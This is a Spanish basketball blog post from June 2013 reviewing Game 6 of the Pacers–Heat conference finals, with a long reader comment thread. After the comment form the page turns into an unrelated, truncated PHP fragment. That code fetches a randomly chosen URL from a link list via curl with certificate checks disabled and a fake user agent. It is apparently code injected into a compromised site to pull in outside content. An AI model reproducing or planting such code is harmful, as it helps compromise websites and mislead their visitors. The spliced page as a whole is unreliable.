La Crónica: Habrá séptimo

02 de June de 2013 por MagicJohnson32

HibbertHabrá séptimo. Por supuesto que lo habrá. Lo merecieron los Pacers, ganadores anoche por 77-91, y lo merece esta serie que recordaremos durante mucho tiempo. El recuerdo exacto que nos quede de ella dependerá de lo que ocurra a partir de las 2h30 de la madrugada del lunes al martes en el AmericanAirlines de Miami. ¿La recordaremos como aquella vez en que LeBron cargó con su equipo hasta las Finales sin apenas ayuda de Wade y Bosh? ¿O como la ocasión en que los Pacers sorprendieron a (casi) todo el mundo de la mano de Paul George y Roy Hibbert? Cuando apenas quedan por escribirse las líneas finales de este magnífico relato, son los Pacers quienes vienen haciendo la mejor caligrafía, pese a que la lógica dicta que hay que seguir considerando a los Heat como claros favoritos.

Pero lo cierto es que el favoritismo de los de Florida se apoya, más que nunca y de manera casi exclusiva, en la figura de LeBron James. Los problemas físicos de Wade y la inferioridad de Bosh en la pintura han acabado trascendiendo más allá de sus respectivos rendimientos individuales: en el momento más inoportuno, los Heat se ven inmersos en una crisis de identidad. Ya no hay Big Three. A lo largo de la serie, Haslem ha sido más decisivo que Bosh, y Norris Cole o Chalmers han tenido un rendimiento equivalente al de Wade. Tal vez haya que cuestionar a James por abandonar la fórmula que hizo a estos Heat casi invencibles, y a Spoelstra por permitirlo, pero ante la escasa producción de sus compañeros es LeBron quien asume la responsabilidad aunque sea a costa de -como dijo al final del quinto partido- volver a sus días de Cleveland.

Anoche los “Miami Cavaliers” no fueron rival para los Pacers. Con Hibbert como pieza central del engranaje defensivo y a través de la asociación del pívot con Paul George en ataque, el equipo local regresó a la fórmula que más le conviene. De entrada, le sirvió para resguardarse ante el chaparrón de triples que le cayó en el primer cuarto, cuando los Heat anotaron 18 de sus 23 puntos desde más allá de la línea. En el segundo cuarto, los Pacers hicieron un primero amago de demarre (25-31), abortado por Ray Allen y Norris Cole para llegar igualados al descanso (40-39). Pero tras la reanudación, ahora sí, Indiana desató un ataque demoledor, que incluyó un parcial de 6-23 y dejó en evidencia que Wade no está en condiciones de liderar. El foco del partido se situó definitivamente sobre Hibbert, capital en defensa e indescifrable en ataque para sus rivales. Ni siquiera se puede decir que hubo batalla en las pinturas: fue una masacre. Y cuando Spoelstra enviaba dobles y triples ayudas para frenar al gigante de Georgetown, entonces era turno de Paul George, muy acertado esta vez desde la larga distancia.

Pese a todo, cuatro tiros libres de James en los últimos 2 segundos del cuarto abrieron una brecha de esperanza de remontada para los Heat (55-68). El arranque del 4º cuarto fue el momento más delicado para los Pacers, que vieron cómo su ventaja se redujo a 6 tras dos triples consecutivos de Mike Miller (64-70) y, poco después, a 4 tras dos bandejas de LeBron (68-72). Apareció entonces David West, invisible hasta el momento y claramente afectado por la fiebre que arrastraba. Más le valdría a Chris Bosh tomar nota del papel de West, de su esfuerzo y su lucha por encontrar la manera de sumar. El regreso de Hibbert a pista, después de apenas 3 minutos de descanso, restauró el orden: parcial de 0-9 y partido sentenciado (68-81) a falta de poco más de 3:00 para el final.

La condición de favoritos sigue siendo de los Heat de cara al séptimo, pero también recae sobre ellos la presión y las dudas. Ya sabemos de qué es capaz LeBron James en este tipo de partidos, de esos que perfilan de manera decisiva el legado de un jugador, pero estos Pacers han dado motivos sobrados para que no les limitemos al papel de víctimas propiciatorias.

PREMIOS

LeBronMVP: La mejor pareja, con diferencia, de estas ECF, están siendo Paul George y Roy Hibbert. El alero trabajó incansablemente en defensa y sumó 28 puntos (11/19 tiros), 8 rebotes, 5 asistencias y 3 robos. El pívot dominó en ambos lados de la pista con 24 puntos (11/20), 11 rebotes (5 ofensivos) y 1 tapón que no hace justicia a la intimidación que provocó en los rivales.

Sorpresa: La ausencia de Chris Andersen sirvió a Joel Anthony para disfrutar anoche de más minutos de los que había disputado hasta el momento en todos los partidos de estos Playoffs. Y, para lo que es él, los aprovechó con 2 puntos, 8 rebotes (5 ofensivos), 1 robo y 3 tapones.

Decepción: Big Three No More. Chris Bosh y Dwyane Wade desaparecieron de nuevo y se limitaron a sumar entre ambos un 4 de 19 en tiros, 15 puntos, 6 rebotes, 1 asistencia, 2 robos, 2 tapones y 5 pérdidas.

Esfuerzo en vano: 29 puntos (10/21 tiros), 7 rebotes, 6 asistencias, 2 robos, 1 tapón. Un día más, LeBron fue el mejor de los Heat.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

25 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Hoy en día ver a Bosh palmear una canasta o jugar 1×1 en el poste bajo es un milagro. En el cuarto cuando tuvo el segundo esguince de la serie parecía que su influencia real era increíble, porque fue irse a descansar y el equipo perdió el partido, pero cada vez me doy más cuenta de que fue una quimera, y que en realidad poco o nada está aportando al equipo, como la pasada temporada. Wade está igual de perdido, al menos el año pasado reaccionó en el quinto y luego en el sexto fue clave, pero este año está dormido, no puede con Stephenson, al que no es capaz de superar en ataque, cuando hay un miss match y se empareja con George, su defensa es ridícula y George hace de él lo que le da la gana… en fin, LeBron contra el mundo como bien habeis dicho, y luego dosis de Chalmers y Norris Cole. Mike Miller defendió mil veces mejor que Wade. Para mí, habría que darle un toque de atención en el séptimo de la serie y salir con Miller de titular, para que Wade espabile y salga rabiado en el segundo cuarto. Me parece que es la única manera de hacerle espabilar.

    Y luego, si nos apartamos del apartado individual y vamos al colectivo, lamentable trabajo ofensivo de Miami. Todos los ataques 1×1 y a ver si los árbitros regalan una falta, mientras que Indiana, exceptuando ese blackout de principios del último cuarto, el resto del partido jugaron un juego muy bonito, con un gran George Hill en la dirección, un superlativo Roy Hibbert cerca del aro, que está totalmente imparable, un peleón David West, que no se arruga ni aunque falle 10 tiros seguidos, y un resolutivo, esta vez sí desde el principio hasta el final del partido sin camuflarse, Paul George.

    La falta de Chris Andersen se notó, Anthony le puso ganas pero no tiene nivel ofensivo ni parecido a Andersen, y un último apunte sobre LeBron James. El 90% de sus canastas de arrancar 1×1, superar a su par y finalizar con bandeja frente a un pívot rival, son falta personal en ataque. SIEMPRE, SIEMPRE, VA CON EL CODITO DANDO EN CUELLO, PECHO, HOMBRO, ESTÓMAGO O DONDE SEA DEL RIVAL, Y PORQUE TONY BROTHERS TUVO PELOTAS DE PITARLE UNA MISERABLE FALTA EN ATAQUE, YA SE PUSO COMO UN ESQUIZOFRÉNICO.

    Debería relajarse, jugar bien, saber que es un privilegiado porque está mimado por los árbitros casi siempre, y no lloriquear cuando se enfrente a un tío con personalidad como Joe Crawford y se tira todo el partido llorando. Yo lo dije el otro día, me pareció discutible pitarle tantas faltas en los bloqueos en ataque, pero desde luego, desde mi punto de vista, muchos partidos no debería acabarlos por esas faltas en ataque en las penetraciones. Es que es asombroso que no le piten nada y siempre entrando con el codito… es un poco lo que hace David West, pero LeBron muy exagerado

      Citar

  2. Denise dice:
    #2

    Sancho88:
    y un último apunte sobre LeBron James. El 90% de sus canastas de arrancar 1×1, superar a su par y finalizar con bandeja frente a un pívot rival, son falta personal en ataque. SIEMPRE, SIEMPRE, VA CON EL CODITO DANDO EN CUELLO, PECHO, HOMBRO, ESTÓMAGO O DONDE SEA DEL RIVAL, Y PORQUE TONY BROTHERS TUVO PELOTAS DE PITARLE UNA MISERABLE FALTA EN ATAQUE, YA SE PUSO COMO UN ESQUIZOFRÉNICO.

    Debería relajarse, jugar bien, saber que es un privilegiado porque está mimado por los árbitros casi siempre, y no lloriquear cuando se enfrente a un tío con personalidad como Joe Crawford y se tira todo el partido llorando. Yo lo dije el otro día, me pareció discutible pitarle tantas faltas en los bloqueos en ataque, pero desde luego, desde mi punto de vista, muchos partidos no debería acabarlos por esas faltas en ataque en las penetraciones. Es que es asombroso que no le piten nada y siempre entrando con el codito… es un poco lo que hace David West, pero LeBron muy exagerado

    No estoy de acuerdo, la falta en la que protesta echandose la carrera, para mí es falta clara del defensor, cambio mucho la pelicula del partido, ya que los Heat estaban en plena remontada y podían haberse puestos a 6 ó 7 puntos, y en lugar de eso se pusieron a 11.
    Yo no creo que Lebron sea un llorón ni un mimado, éstos adjetivos se los dejo a Popovych y a Duncan respectivamente.

      Citar

  3. Sancho88 dice:
    #3

    Denise, siempre que le pitan una falta se desespera y pone cara de llorisquear, no me digas que no. No acepta ni una. Y dime si usa los codos de manera legal, menudos emburriones que pega, siempre separando a sus rivales a codazos para poder penetrar él. Eso es falta en ataque. Si acaso, no debería ser falta en ataque porque el defensor estaba dentro del semicírculo, y creo que ahí no se pueden pitar faltas en ataque por una norma absurda, pero bueno, es la norma. Para mí, Lebron llevaba todo el partido haciendo faltas en ataque de ese estilo, y quizás tengas razón, que es aparentemente en la que menos lo parece, pero si te has visto el partido eso que comento lo has tenido que ver.

    Luego otros dos apuntes. Excelente defensor Lance Stephenson. Anoche demostró que cuando no se cree MIchael Jordan su aportación al equipo es increíble. Defendió muy bien y repartió juego, me gusta mucho más cuando da un pase más que cuando se las intenta jugar todas.

    Y apunte sobre Ray Allen. Qué coño le pasa a este hombre? O le taponan los triples, o son unas castañas, o está más lento que mi abuela… dios mío, está para retirarse eh? fuera de forma totalmente. 20% en triples entre semis y finales de conferencia. No obstante, puede ser un factor x en el último partido.

      Citar

  4. MagicJohnson32 dice:
    #4

    Sancho88:
    …Si acaso, no debería ser falta en ataque porque el defensor estaba dentro del semicírculo, y creo que ahí no se pueden pitar faltas en ataque por una norma absurda, pero bueno, es la norma…

    Sobre eso: la norma se refiere a las cargas, pero si el atacante golpea con el codo, la rodilla o lo que sea, sigue siendo falta aunque estén dentro del semicírculo.

    Completamente de acuerdo sobre lo de Stephenson.

    Y sobre Ray Allen, la cosa es tan grave que hasta está fallando los tiros libres.

      Citar

  5. Sancho88 dice:
    #5

    Si si, lleva 7 de 13 si mal no recuerdo… eso de, ver fallar a Ray Allen en un tiro libre es difícil… cada día es menos difícil. En su favor hay que decir que llevaba un 27/27 hasta esta serie. algo extraño le pasa

      Citar

  6. Sempren dice:
    #6

    Yo no quiero decir que LeBron sea un llorón ni nada de eso, todos vienen haciendo algo parecido. Lo que sí me deja mal cuerpo es su gusto por exagerarlo todo. Le meten muchas leches, pero…
    Acabo de ver este vídeo y me puso de mala uva que un tío tan superior, para mí el mejor jugador del mundo en estos momentos, “necesite” hacer este tipo de cosas http://www.worldstarhiphop.com/videos/video.php?v=wshhIjpx3vXC0DZfE4ZJ

    Y falta de Hibbert no creo que la fuese, como le leí a alguien ayer, el tío salta en vertical, sin bajar los brazos ni sacarlos para fuera… como mucho no pitar nada, si no ven los codos de LeBron.

    Sobre Ray Allen… ¿falta de confianza? ¿Quizá si jugase más estaría mejor? También lo dudo, porque él sabía dónde iba y a qué…
    Eso sí, luego ver en el banquillo a Rashard Lewis… xD

    Gran partido de los Pacers, con George Hill y David West yendo de menos a más y acompañando muy bien a Paul George y Hibbert, y aunque West ya iba aportando sus pases y conocimiento del juego, acabó siendo muy importante con esas canastas en el último cuarto (no sé si 8 puntos o más al final).

      Citar

  7. Denise dice:
    #7

    Pero con Lebron pasa lo mismo que con Cristiano Ronaldo, son tan buenos, que tienen un monton de camaras exclusivamente pendiente de ellos, y cada gesto/acción que realiza se magnifica todo de una manera a veces absurda.
    Floppings, codos, lloros, gestos los hace todo el mundo, pero no vende igual cuando lo hace Lebron a cuando lo hace un Gerald Henderson.

      Citar

  8. GreenPride dice:
    #8

    Bueno pues serie que se va al 7º y decisivo partido con la impresión de que Miami está tocado y que aún así son favoritos para ese partido decisivo ya que se espera que LeBron pueda llevarles al triunfo…
    En este 6º partido los Heat sobrevivieron en el primer cuarto incluso por delante gracias a su acierto en los triples pero ya en el segundo se vieron un par de ventajas para los Pacers que se basaban en lo de siempre, dominio del rebote, presencia interior de Hibbert a ambos lados y un gran Paul George esta vez acompañado por George Hill. Con esas pautas y a pesar de un desacertado West con fiebre los Pacers colapsaron a los Heat en el tercer cuarto y los sacaron del partido.
    Hubo un amago de reacción por parte de Miami en el último cuarto de manos de LeBron y Mike Miller pero enseguida la vuelta de Hibbert volvió a poner las cosas en su sitio con un 11-2 que pasó la ventaja de 4 a 13 y sentenció el partido.
    Por los Heat, partido normal de LeBron y desaparecidos Wade y Bosh. Wade está claramente mermado en su físico y cómo su lanzamiento ha ido para atrás pues está desaparecido. Además sufre en defensa sobre todo cuando se queda con George. Mientras Bosh no tiene excusa totalmente superado por los interiores de los Pacers. Ni un intento de lanzamiento interior, poquísimos rebotes y sólo su acierto en los triples que no le sirven de excusa para jugar siempre a más de 5 metros del aro. Estas series le están destrozando, más aún en un equipo que pretende jugar con él de 5. Esta vez hubo muchos minutos para Joel Anthony en ausencia de Andersen y esto limita aún más el ataque Heat ya que cierra espacios para LeBron.
    Para el 7º parece que todo depende de LeBron pero en verdad hay muchos factores:
    Por los Pacers, control del rebote que deben ganar por más de 10 de diferencia. Producción de Hibbert&West en la pintura. Mantener sin faltas a Hibbert. Lanzamientos exteriores de Hill y juego all-around de George y la defensa en general intentando que los Heat tengan que jugar con dos interiores y poder dificultar las penetraciones de James. No perder balones
    Por los Heat. Ayuda a James, tienen que salir al menos un buen partido de Wade o Bosh. Lanzamiento exterior de Allen, Cole, Miller, Chalmers…. los Pacers se van a cerrar todo lo que puedan y de sus lanzamientos puede depender romper la defensa. Intentar equilibrar la lucha por el rebote al máximo e intentar robar balones para poder jugar en transición antes de que la defensa de los Pacers esté colocada. Defensa de anticipación sobre Hibbert&West, una vez que reciben son incapaces de pararlos así que deberán ser extra-agresivos en líneas de pase para intentar que el balón llegue mal y lejos del aro a ambos.
    Se plantea un fenomenal 7º partido en el que hay la impresión de que Indiana podría dar la gran sorpresa. Yo sinceramente lo veo difícil. A pesar de que los Heat están jugando bastante mal (buena parte de culpa tienen los Pacers) creo que en un partido decisivo la experiencia de los Heat y la falta de un jugador realmente clutch en los Pacers puede resultar decisiva. Espero un partido igualado hasta el último cuarto y ahí unos Heat liderados por LeBron con ayuda de algún secundario para conseguir la victoria (algo parecido al 5º partido). Sin embargo por lo visto hasta ahora los Pacers tienen opciones. Es hora de ver de qué pasta son estos Pacers y si realmente creen en la gran victoria… (¿Será capaz Paul George de liderarles a las Finales ante LeBron?)

      Citar

  9. rumbero dice:
    #9

    Sempren:
    Gran partido de los Pacers, con George Hill y David West yendo de menos a más y acompañando muy bien a Paul George y Hibbert, y aunque West ya iba aportando sus pases y conocimiento del juego, acabó siendo muy importante con esas canastas en el último cuarto (no sé si 8 puntos o más al final).

    El último cuarto de West les dió el partido, ahí se notan las tablas. Cuando más apretaba Miami con ese par de triples de Miller se sacó como dices 8 puntos de la manga y 3 o 4 rebotes vitales. La fiebre de los PO, suele venirles bien a los afectados. A ver como anda hoy porque a la parejita Hibbert-George les va a venir bien que les pueda echar una mano. Favorito Miami aunque cada vez lo va siendo menos conforme avanza la serie. O espavilan Wade y Bosh o Lebron va a tener que hacer una de las suyas si no quieren llevarse el susto.

      Citar

  10. HisRoyalAirness dice:
    #10

    Muy de acuerdo con Sancho en lo de las faltas ofensivas. Se las pitan a todo dios menos a él y a Carmelo. Y las de bloqueo ilegal a mí me parecen escandalosas, son el tipo de infracciones que sólo se les pitan a los jugadores secundarios.

    Por cierto Denise, Cristiano y Lebron se llevan críticas porque las cámaras están más pendientes de ellos? Se ve que a Messio a Jordan en su día no les enfocan porque no venden. Pobres vedettes

      Citar

  11. HisRoyalAirness dice:
    #11

    Y sí, la alegoría Messi-Jordan está hecha con toda la intención del mundo

      Citar

  12. Esteban dice:
    #12

    no soy amante del juego de bosh ni muchi menos, pero creo q resulta evidente que esta teniendo grandes problemas fisicos,

    no solo esta siendo superado por west y hibbert, sino pareciera que les tiene miedo ya que ni se acerca a la zona, bosh es frio y amargo como diriamos en argentina pero las finales de conferencia frente a garnett mostro ago de corazon, en esta sin dudas no hay corazon que valga, su toibillo debe molestarlo mucho

      Citar

  13. MagicJohnson32 dice:
    #13

    Cómo molan las crónicas de GreenPride dos días después de cada partido 😉

      Citar

  14. Denise dice:
    #14

    Jason Kidd se retira, haciendose un favorcito a sí mismo (daba pena arrastrase en este ultimo año) y a los Knicks en el que le quedaban por cobrar unos 6 millones.

    Ya que creo que el nombre de este blog es un homenaje al hijo de Kidd, molaría un articulo especial sobre el base para que los jóvenes como yo pudieramos recordar y apreciar más la figura de este base.

      Citar

  15. Denise dice:
    #15

    Denise:
    Jason Kidd se retira, haciendose un favorcito a sí mismo (daba pena arrastrase en este ultimo año) y a los Knicks en el que le quedaban por cobrar unos 6 millones.

    Ya que creo que el nombre de este blog es un homenaje al hijo de Kidd, molaría un articulo especial sobre el base para que los jóvenes como yo pudieramos recordar y apreciar más la figura de este base.

    Y por cierto….será Dallas quien le retire la camiseta, no?, ó los Nets?

      Citar

  16. rumbero dice:
    #16

    Denise: Y por cierto….será Dallas quien le retire la camiseta, no?, ó los Nets?

    Cuban dijo es su momento que no se la iba a retirar ni de coña por como se fue a los Knicks, así que en Dallas lo tiene mal. En los Nets no tengo ninguna duda que si se la van a retirar. Uno de los mejores bases de la historia.
    Casualidad o no, los Rookies del año del 94 fueron…Grant Hill y Jason Kidd. Pasan los años

      Citar

  17. Esteban dice:
    #17

    una gran carrera la de jason kidd, pero sacando los dos `riomeros años en los nets donde los llevo a la final de liga, siempre se lo vio como un jugador franquicia, cosa que no era y justamente eso se trajudo en constantes fracasos de sus equipos

    cuando recalo en dallas y asumio el papel de un base importante, pero muy lejano al papel de jugador franquicia, estos se llevaron el titulo

      Citar

  18. Sancho88 dice:
    #18

    Chapó por estos dos señores. Tanto Grant Hill como Jason Kidd nos enseñaron a muchos a amar este deporte. La putada es que no pudo acabar con su sequía de tiros fallados consecutivos… habría estado bien para cerrar su carrera, aunque no podemos quedarnos con esa anécdota obviamente. Un maestro de los triples-dobles, un genio del 10-10-10 en los NJN durante tantos años y años que uno ni se acuerda. Su triunvirato con Jefferson y Carter debería haberles dado un anillo juntos. Él lo consiguió luego con los Mavs, Vicente lo va a rozar en uno o dos años con los Mavericks también, pero de Jefferson ya está jodida la cosa… Por cierto, en esos Nets no estaba también Kenyon Martin? Era un equipazo no?

      Citar

  19. melo15 dice:
    #19

    No soy un esperto de esa epoca, pero diria que Kidd llego a las dos Finales con Martin y con Jefferson y Carter no llego a ir, es mas me parece que no tuvieron mucho exito en postemporada.
    De todas maneras en el Oeste no habria llegado ni a Semifinales con ese equipo.

      Citar

  20. Esteban dice:
    #20

    Sancho88:
    Chapó por estos dos señores. Tanto Grant Hill como Jason Kidd nos enseñaron a muchos a amar este deporte. La putada es que no pudo acabar con su sequía de tiros fallados consecutivos… habría estado bien para cerrar su carrera, aunque no podemos quedarnos con esa anécdota obviamente. Un maestro de los triples-dobles, un genio del 10-10-10 en los NJN durante tantos años y años que uno ni se acuerda. Su triunvirato con Jefferson y Carter debería haberles dado un anillo juntos. Él lo consiguió luego con los Mavs, Vicente lo va a rozar en uno o dos años con los Mavericks también, pero de Jefferson ya está jodida la cosa… Por cierto, en esos Nets no estaba también Kenyon Martin? Era un equipazo no?

    cuando alcanzaron las finales esos nets no estaba carter

    eran si no recuerdo mal, kidd-kitles-jefferson- van horn -martin

    la segunda final si no me equivoco, estaban mutumbo en el lugar de van horn y tambien mcchulloch

      Citar

  21. MagicJohnson32 dice:
    #21

    Las primeras finales de Kidd con aquellos Nets son las de 2002 contra los Lakers, con Kidd, Kittles, Van Horn, Kenyon y McCullogh de quinteto titular, y Jefferson, Jason Collins y Aaron Williams como principales suplentes. Durante años tuve un póster en mi habitación con el mítico mate de Kobe sobre McCullogh, jeje.

    Al año siguiente, en las finales contra Spurs, McCullogh y Van Horn ya no estaban, Collins y Jefferson eran titulares, y en el banco estaban Rodney Rogers y Mutombo.

    Vale que es el Este, pero vaya mérito de Kidd llevando a ese equipo a dos finales.

      Citar

  22. txusma dice:
    #22

    MagicJohnson32:

    Vale que es el Este, pero vaya mérito de Kidd llevando a ese equipo a dos finales.

    Y por hacer parecer muy bueno a Kenyon Martin…

      Citar

  23. Vader dice:
    #23

    No lo vi, pero parece que al final no hubo séptimo partido…

      Citar

  24. HisRoyalAirness dice:
    #24

    melo15:
    No soy un esperto de esa epoca, pero diria que Kidd llego a las dos Finales con Martin y con Jefferson y Carter no llego a ir, es mas me parece que no tuvieron mucho exito en postemporada.
    De todas maneras en el Oeste no habria llegado ni a Semifinales con ese equipo.

    Y Lebron posiblemente no habría olido las Finales en el Oeste, no te j*de.

      Citar

  25. Denise dice:
    #25

    HisRoyalAirness: Y Lebron posiblemente no habría olido las Finales en el Oeste, no te j*de.

    Si claro..ahora resulta que los Heat de los ultimos 3 años son una banda…seamos mas objetivos por favor..

    Los Nets creo que fueron vapuleados cuando llegaron a las Finales, los Heat ya le ganaron el anillo al rival del Oeste, perdieron contra los Mavs una serie en la que fueron mejores durante mucho tiempo de las Finales, y este año ya veremos lo que sucede.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>